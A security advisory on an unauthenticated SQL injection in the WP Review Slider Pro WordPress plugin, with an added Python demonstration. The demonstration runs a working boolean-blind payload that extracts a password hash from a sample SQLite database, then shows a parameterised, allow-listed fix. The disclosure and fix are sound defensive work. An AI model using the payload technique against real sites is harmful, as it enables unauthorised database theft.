PT-2026-54949 · https://wpreviewslider.com/ · WP Review Slider Pro
H0Xilo · Published 2026-07-02 · Updated 2026-07-02 · CVE-2026-8441
CVSS v3.1: 7.5 (High)
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
The WP Review Slider Pro plugin for WordPress is vulnerable to SQL injection via the 'notinstring' parameter of the wprp_load_more_revs AJAX action in versions up to, and including, 12.7.2. The parameter is read from $_POST['notinstring'] and passed through sanitize_text_field(), which strips HTML and normalises whitespace but provides no SQL safety. The value is then concatenated directly into an unquoted numeric AND id NOT IN (...) clause and executed via $wpdb->get_results() without $wpdb->prepare() or intval() casting. Because the value sits in an unquoted numeric context, WordPress's wp_magic_quotes() protection (which only escapes embedded quotes) is ineffective. The AJAX hook is registered via wp_ajax_nopriv_wprp_load_more_revs, and the nonce required by check_ajax_referer() is exposed via wp_localize_script() on any frontend page that renders the plugin shortcode, so an unauthenticated attacker who can reach a public page hosting the plugin can extract arbitrary data from the database via blind/time-based injection.
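The following is an added example, not the plugin's code or a proof of concept from the advisory. It reconstructs the described pattern against an in-memory SQLite database with constructed sample data, approximates sanitize_text_field() and wp_magic_quotes() in Python to show why neither helps in an unquoted numeric context, runs a boolean-based blind extraction through the NOT IN (...) clause (a quote-free payload, so magic quotes never fire), and sets it beside a hardened handler that allow-lists integer ids and binds one placeholder per id. The table and column names (reviews, users, pass_hash) and the review schema are assumptions.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not the plugin's schema): the reviews the AJAX
    action pages through, plus a second table an attacker would want to read."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE reviews (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO reviews VALUES (1, 'Great', 1), (2, 'Fine', 1), (3, 'Meh', 1);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t');
        """
    )
    return db


def sanitize_text_field(value: str) -> str:
    """Approximation of WordPress sanitize_text_field(): strip tags and control
    bytes, collapse whitespace. Nothing here escapes SQL metacharacters."""
    value = re.sub(r"<[^>]*>", "", value)
    value = re.sub(r"[\x00-\x1f\x7f]", "", value)
    return re.sub(r"\s+", " ", value).strip()


def wp_magic_quotes(value: str) -> str:
    """Approximation of wp_magic_quotes() (addslashes): escapes quotes and
    backslashes only, which does nothing in an unquoted numeric context."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def vulnerable_query(notinstring: str) -> str:
    """The pattern from the advisory: sanitised, then concatenated unquoted."""
    clean = sanitize_text_field(wp_magic_quotes(notinstring))
    return ("SELECT id, title FROM reviews WHERE published = 1 "
            "AND id NOT IN (" + clean + ")")


def vulnerable_handler(db: sqlite3.Connection, notinstring: str) -> list:
    return db.execute(vulnerable_query(notinstring)).fetchall()


def blind_payload(pos: int, code: int) -> str:
    """Boolean-based blind probe needing no quotes: 'id NOT IN (id)' is false
    for every row, so rows come back only when the appended condition holds.
    unicode()/substr() are SQLite; MySQL would use ORD()/SUBSTRING(), and a
    time-based variant would use SLEEP() instead of the row-count oracle."""
    return (f"id) OR (SELECT unicode(substr(pass_hash,{pos},1)) "
            f"FROM users WHERE id=1)={code} AND (1")


def extract_via_blind_sqli(db: sqlite3.Connection, max_len: int = 32) -> str:
    """Recover users.pass_hash one printable character at a time."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            if vulnerable_handler(db, blind_payload(pos, code)):
                recovered += chr(code)
                break
        else:
            break  # no character matched: end of the string
    return recovered


def parse_notinstring(notinstring: str):
    """Allow-list parse: comma-separated ASCII integers or nothing. Returns
    None on anything else so the handler can reject the request outright."""
    parts = [p.strip() for p in notinstring.split(",") if p.strip()]
    if not all(p.isascii() and p.isdigit() for p in parts):
        return None
    return [int(p) for p in parts] or [0]  # id 0 never exists; keeps SQL valid


def hardened_handler(db: sqlite3.Connection, notinstring: str):
    """One bound placeholder per id. The WordPress equivalent is
    array_map('intval', ...) plus $wpdb->prepare() with one %d per id."""
    ids = parse_notinstring(notinstring)
    if ids is None:
        return None  # a real handler would wp_send_json_error() here
    placeholders = ",".join("?" * len(ids))
    sql = ("SELECT id, title FROM reviews WHERE published = 1 "
           "AND id NOT IN (" + placeholders + ")")
    return db.execute(sql, ids).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable handler:", extract_via_blind_sqli(db))
    print("hardened handler on same payload:", hardened_handler(db, blind_payload(1, 115)))
```

Run as a script, the vulnerable handler leaks the full pass_hash value with one request per candidate character, while the hardened handler returns None (reject) for the same payload and behaves normally for "2,3". The rejection rather than silent intval() coercion is a deliberate choice: a list that contains anything but integers is not a legitimate request and should be logged as such.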
Weakness Enumeration
SQL injection
Affected Products
WP Review Slider Pro, versions up to and including 12.7.2